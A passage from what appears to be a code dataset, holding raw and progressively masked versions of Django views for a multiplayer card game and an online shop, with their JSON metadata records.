cnt.most_common():\n if word not in banned:\n return word\n\n\nif __name__ == \"__main__\":\n # paragraph = \"Bob hit a ball, the hit BALL flew far after it was hit.\"\n # banned = [\"hit\"]\n # paragraph = \"Bob. hIt, baLl\"\n # banned = [\"bob\", \"hit\"]\n paragraph = \"a, a, a, a, b,b,b,c, c\"\n banned = ['a']\n sol = Solution()\n print(sol.mostCommonWord(paragraph, banned))\n \n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.shortcuts import render, redirect
from .models import Game, Player, CardsInHand, Feedback
from django.db.models import Q
from .forms import GameForm, JoinForm, FeedbackForm
from django.shortcuts import get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from django.views.generic import CreateView
import json
# from django.contrib.auth.decorators import login_required
def get_joined_players(request, game_id):
game = get_object_or_404(Game, pk=game_id)
return HttpResponse(str(game.joined_players))
def create_new_game(request):
if request.method == "POST":
form_data = json.loads(request.body.decode('utf-8'))
form = GameForm(form_data)
if form.is_valid():
number_of_players = form.cleaned_data["number_of_players"]
new_game = Game(number_of_players=int(number_of_players))
new_game.instantiate() # initializes new game
new_game.save() # save new game to db
# create first player
new_player = Player(name=form.cleaned_data["creator_name"], game_id=new_game)
new_player.save()
# create new session to allow the user to play the game
request.session['player_id'] = new_player.pk
return JsonResponse({
"code": new_game.code,
"game_id": new_game.pk,
"number_of_players": number_of_players,
})
# return render(request, "game_created.html", {
# "form": form,
# "game_code": new_game.code,
# "n_players": number_of_players,
# "game_id": new_game.pk,
# "your_name": new_player.name,
# })
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
else:
# set a dummy player id in player's session. this is needed to make channels session persistence work (for matchmaking)
if('player_id' not in request.session):
request.session['player_id'] = 0
create_form = GameForm(initial={'number_of_players': '2'})
join_form = JoinForm()
feedback_form = FeedbackForm()
return render(
request,
"newhome.html",
{
"create_form": create_form,
"join_form": join_form,
"feedback_form": feedback_form,
}
)
def join_game(request):
if request.method != "POST":
return HttpResponseRedirect("/game")
form_data = json.loads(request.body.decode('utf-8'))
form = JoinForm(form_data)
if form.is_valid():
code = int(form.cleaned_data['code'])
input_name = form.cleaned_data['name']
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
game = get_object_or_404(Game, code=code)
if(game.joined_players < game.number_of_players):
# increment the number of players who joined this game
game.joined_players = game.joined_players + 1
game.save()
# create player and append it to this game
new_player = Player(name=input_name, game_id=game, player_number=game.joined_players)
new_player.save()
# create new session to allow user to play
request.session['player_id'] = new_player.pk
if(new_player.player_number == game.number_of_players):
# last player joined: deal cards to all players; game can now being
game.deal_cards_to_players()
return JsonResponse(game.pk, safe=False)
def game(request, game_id):
err_str = ''
this_game = get_object_or_404(Game, pk=game_id)
print(request.session.keys())
# if game is over, redirect to home
if this_game.has_been_won:
return redirect(create_new_game)
# get players who joined this game
players = Player.objects.filter(game_id=game_id)
if('player_id' not in request.session): # check if user has a session variable player_id
err_str = "Unauthenticated user"
this_player = get_object_or_404(Player, pk=request.session['player_id'])
if(this_player not in players): # check if this player has joined the game
err_str = "La partita richiesta non esiste o si è già conclusa."
if err_str != '':
return render(
request,
'error.html',
{
'error': err_str,
},
status=403
)
return render(request, 'gametest.html', {
'game_id': this_game.pk,
'number_of_players': this_game.number_of_players,
})
def feedback_create(request):
if request.method != "POST":
return HttpResponseRedirect("/game")
form_data = json.loads(request.body.decode('utf-8'))
form = FeedbackForm(form_data)
if form.is_valid():
sender_name = form.cleaned_data['sender_name']
email = form.cleaned_data['email']
message = form.cleaned_data['message']
else:
return JsonResponse(form.errors.as_json(), safe=False, status=400)
feedback = Feedback(sender_name=sender_name, email=email, message=message)
feedback.save()
return JsonResponse("[]", status=200, safe=False)
def restart_game(request, game_id):
this_game = get_object_or_404(Game, pk=game_id)
# if game isn't over, redirect to home
if not this_game.has_been_won:
return redirect(create_new_game)
# get players who joined this game
players = Player.objects.filter(game_id=game_id)
if('player_id' not in request.session): # check if user has a session variable player_id
return redirect(create_new_game)
this_player = get_object_or_404(Player, pk=request.session['player_id'])
if(this_player not in players): # check if this player has joined the game
return redirect(create_new_game)
this_game.reset()
this_game.deal_cards_to_players()
return JsonResponse({'status': 'ok'})
|
normal
|
{
"blob_id": "d650f578ea30772489625ee26f3e4bf04131964b",
"index": 6140,
"step-1": "<mask token>\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\n<mask token>\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-2": "<mask token>\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\n<mask token>\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-3": "<mask token>\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\ndef create_new_game(request):\n if request.method == 'POST':\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n if form.is_valid():\n number_of_players = form.cleaned_data['number_of_players']\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate()\n new_game.save()\n new_player = Player(name=form.cleaned_data['creator_name'],\n game_id=new_game)\n new_player.save()\n request.session['player_id'] = new_player.pk\n return JsonResponse({'code': new_game.code, 'game_id': new_game\n .pk, 'number_of_players': number_of_players})\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n if 'player_id' not in request.session:\n request.session['player_id'] = 0\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(request, 'newhome.html', {'create_form': create_form,\n 'join_form': join_form, 'feedback_form': feedback_form})\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-4": "from django.shortcuts import render, redirect\nfrom .models import Game, Player, CardsInHand, Feedback\nfrom django.db.models import Q\nfrom .forms import GameForm, JoinForm, FeedbackForm\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.generic import CreateView\nimport json\n\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\n\ndef create_new_game(request):\n if request.method == 'POST':\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n if form.is_valid():\n number_of_players = form.cleaned_data['number_of_players']\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate()\n new_game.save()\n new_player = Player(name=form.cleaned_data['creator_name'],\n game_id=new_game)\n new_player.save()\n request.session['player_id'] = new_player.pk\n return JsonResponse({'code': new_game.code, 'game_id': new_game\n .pk, 'number_of_players': number_of_players})\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n if 'player_id' not in request.session:\n request.session['player_id'] = 0\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(request, 'newhome.html', {'create_form': create_form,\n 'join_form': join_form, 'feedback_form': feedback_form})\n\n\ndef join_game(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n game = get_object_or_404(Game, code=code)\n if game.joined_players < game.number_of_players:\n game.joined_players = game.joined_players + 1\n game.save()\n new_player = Player(name=input_name, game_id=game, player_number=\n game.joined_players)\n new_player.save()\n request.session['player_id'] = new_player.pk\n if new_player.player_number == game.number_of_players:\n game.deal_cards_to_players()\n return JsonResponse(game.pk, safe=False)\n\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n if this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n err_str = 'Unauthenticated user'\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n err_str = 'La partita richiesta non esiste o si è già conclusa.'\n if err_str != '':\n return render(request, 'error.html', {'error': err_str}, status=403)\n return render(request, 'gametest.html', {'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players})\n\n\ndef feedback_create(request):\n if request.method != 'POST':\n return HttpResponseRedirect('/game')\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse('[]', status=200, safe=False)\n\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n if not this_game.has_been_won:\n return redirect(create_new_game)\n players = Player.objects.filter(game_id=game_id)\n if 'player_id' not in request.session:\n return redirect(create_new_game)\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if this_player not in players:\n return redirect(create_new_game)\n this_game.reset()\n this_game.deal_cards_to_players()\n return JsonResponse({'status': 'ok'})\n",
"step-5": "from django.shortcuts import render, redirect\nfrom .models import Game, Player, CardsInHand, Feedback\nfrom django.db.models import Q\nfrom .forms import GameForm, JoinForm, FeedbackForm\nfrom django.shortcuts import get_object_or_404\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.views.generic import CreateView\nimport json\n# from django.contrib.auth.decorators import login_required\n\ndef get_joined_players(request, game_id):\n game = get_object_or_404(Game, pk=game_id)\n return HttpResponse(str(game.joined_players))\n\ndef create_new_game(request):\n if request.method == \"POST\":\n form_data = json.loads(request.body.decode('utf-8'))\n form = GameForm(form_data)\n\n if form.is_valid():\n number_of_players = form.cleaned_data[\"number_of_players\"]\n\n new_game = Game(number_of_players=int(number_of_players))\n new_game.instantiate() # initializes new game\n new_game.save() # save new game to db\n\n # create first player\n new_player = Player(name=form.cleaned_data[\"creator_name\"], game_id=new_game)\n new_player.save()\n\n # create new session to allow the user to play the game\n request.session['player_id'] = new_player.pk\n\n return JsonResponse({\n \"code\": new_game.code,\n \"game_id\": new_game.pk,\n \"number_of_players\": number_of_players,\n })\n # return render(request, \"game_created.html\", {\n # \"form\": form,\n # \"game_code\": new_game.code,\n # \"n_players\": number_of_players,\n # \"game_id\": new_game.pk,\n # \"your_name\": new_player.name,\n # })\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n else:\n # set a dummy player id in player's session. this is needed to make channels session persistence work (for matchmaking)\n if('player_id' not in request.session):\n request.session['player_id'] = 0\n\n create_form = GameForm(initial={'number_of_players': '2'})\n join_form = JoinForm()\n feedback_form = FeedbackForm()\n return render(\n request,\n \"newhome.html\",\n {\n \"create_form\": create_form,\n \"join_form\": join_form,\n \"feedback_form\": feedback_form,\n }\n )\n\ndef join_game(request):\n if request.method != \"POST\":\n return HttpResponseRedirect(\"/game\")\n\n form_data = json.loads(request.body.decode('utf-8'))\n form = JoinForm(form_data)\n if form.is_valid():\n code = int(form.cleaned_data['code'])\n input_name = form.cleaned_data['name']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n\n game = get_object_or_404(Game, code=code)\n if(game.joined_players < game.number_of_players):\n # increment the number of players who joined this game\n game.joined_players = game.joined_players + 1\n game.save()\n # create player and append it to this game\n new_player = Player(name=input_name, game_id=game, player_number=game.joined_players)\n new_player.save()\n\n # create new session to allow user to play\n request.session['player_id'] = new_player.pk\n\n if(new_player.player_number == game.number_of_players):\n # last player joined: deal cards to all players; game can now being\n game.deal_cards_to_players()\n\n return JsonResponse(game.pk, safe=False)\n\ndef game(request, game_id):\n err_str = ''\n this_game = get_object_or_404(Game, pk=game_id)\n print(request.session.keys())\n\n # if game is over, redirect to home\n if this_game.has_been_won:\n return redirect(create_new_game)\n\n # get players who joined this game\n players = Player.objects.filter(game_id=game_id)\n\n if('player_id' not in request.session): # check if user has a session variable player_id\n err_str = \"Unauthenticated user\"\n\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if(this_player not in players): # check if this player has joined the game\n err_str = \"La partita richiesta non esiste o si è già conclusa.\"\n\n if err_str != '':\n return render(\n request,\n 'error.html',\n {\n 'error': err_str,\n },\n status=403\n )\n\n return render(request, 'gametest.html', {\n 'game_id': this_game.pk,\n 'number_of_players': this_game.number_of_players,\n })\n\ndef feedback_create(request):\n if request.method != \"POST\":\n return HttpResponseRedirect(\"/game\")\n\n form_data = json.loads(request.body.decode('utf-8'))\n form = FeedbackForm(form_data)\n if form.is_valid():\n sender_name = form.cleaned_data['sender_name']\n email = form.cleaned_data['email']\n message = form.cleaned_data['message']\n else:\n return JsonResponse(form.errors.as_json(), safe=False, status=400)\n\n feedback = Feedback(sender_name=sender_name, email=email, message=message)\n feedback.save()\n return JsonResponse(\"[]\", status=200, safe=False)\n\ndef restart_game(request, game_id):\n this_game = get_object_or_404(Game, pk=game_id)\n\n # if game isn't over, redirect to home\n if not this_game.has_been_won:\n return redirect(create_new_game)\n\n # get players who joined this game\n players = Player.objects.filter(game_id=game_id)\n\n if('player_id' not in request.session): # check if user has a session variable player_id\n return redirect(create_new_game)\n\n this_player = get_object_or_404(Player, pk=request.session['player_id'])\n if(this_player not in players): # check if this player has joined the game\n return redirect(create_new_game)\n\n this_game.reset()\n this_game.deal_cards_to_players()\n\n return JsonResponse({'status': 'ok'})\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
<|reserved_special_token_0|>
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products, 'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {'form': UserLogInForm}
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = 'Provide valid credentials'
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
from typing import Dict, Any
from urllib import request
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Product
from cart.forms import CartAddProductForm
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from .forms import UserForm, UserLogInForm
from django.views import generic
from django.views.generic import View
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products, 'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product, 'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {'form': UserLogInForm}
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = 'Provide valid credentials'
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, 'shop/login.html')
<|reserved_special_token_1|>
from typing import Dict, Any
from urllib import request
from django.shortcuts import render, get_object_or_404
from django.urls import reverse
from .models import Product
from cart.forms import CartAddProductForm
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from .forms import UserForm, UserLogInForm
from django.views import generic
from django.views.generic import View
def product_list(request):
products = Product.objects.filter(available=True)
context = {'products': products,
'user': request.user}
return render(request, 'shop/product/list.html', context)
def product_detail(request, id, slug):
product = get_object_or_404(Product, id=id, slug=slug, available=True)
cart_product_form = CartAddProductForm()
context = {'product': product,
'cart_product_form': cart_product_form}
return render(request, 'shop/product/detail.html', context)
class UserFormView(View):
form_class = UserForm
template_name = 'shop/signup.html'
# display blank form
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form': form})
# process form data
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
#print(request.user.is_authenticated())
return redirect('/shop/')
return render(request, self.template_name, {'form': form})
def user_login(request):
context = {
'form': UserLogInForm
}
if request.method == "POST":
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user:
login(request, user)
return redirect('/shop/')
else:
context['error'] = "Provide valid credentials"
return render(request, 'shop/login.html', context)
else:
return render(request, 'shop/login.html', context)
def user_logout(request):
if request.method == 'POST':
logout(request)
return render(request, "shop/login.html")
|
flexible
|
{
"blob_id": "1d72a9882aea1e0f808969828ed2e69ecd79ac71",
"index": 7522,
"step-1": "<mask token>\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\n<mask token>\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
"step-3": "<mask token>\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n context = {'products': products, 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {'form': UserLogInForm}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = 'Provide valid credentials'\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
"step-4": "from typing import Dict, Any\nfrom urllib import request\nfrom django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse\nfrom .models import Product\nfrom cart.forms import CartAddProductForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom .forms import UserForm, UserLogInForm\nfrom django.views import generic\nfrom django.views.generic import View\n\n\ndef product_list(request):\n products = Product.objects.filter(available=True)\n context = {'products': products, 'user': request.user}\n return render(request, 'shop/product/list.html', context)\n\n\ndef product_detail(request, id, slug):\n product = get_object_or_404(Product, id=id, slug=slug, available=True)\n cart_product_form = CartAddProductForm()\n context = {'product': product, 'cart_product_form': cart_product_form}\n return render(request, 'shop/product/detail.html', context)\n\n\nclass UserFormView(View):\n form_class = UserForm\n template_name = 'shop/signup.html'\n\n def get(self, request):\n form = self.form_class(None)\n return render(request, self.template_name, {'form': form})\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save(commit=False)\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user.set_password(password)\n user.save()\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return redirect('/shop/')\n return render(request, self.template_name, {'form': form})\n\n\ndef user_login(request):\n context = {'form': UserLogInForm}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n return redirect('/shop/')\n else:\n context['error'] = 'Provide valid credentials'\n return render(request, 'shop/login.html', context)\n else:\n return render(request, 'shop/login.html', context)\n\n\ndef user_logout(request):\n if request.method == 'POST':\n logout(request)\n return render(request, 'shop/login.html')\n",
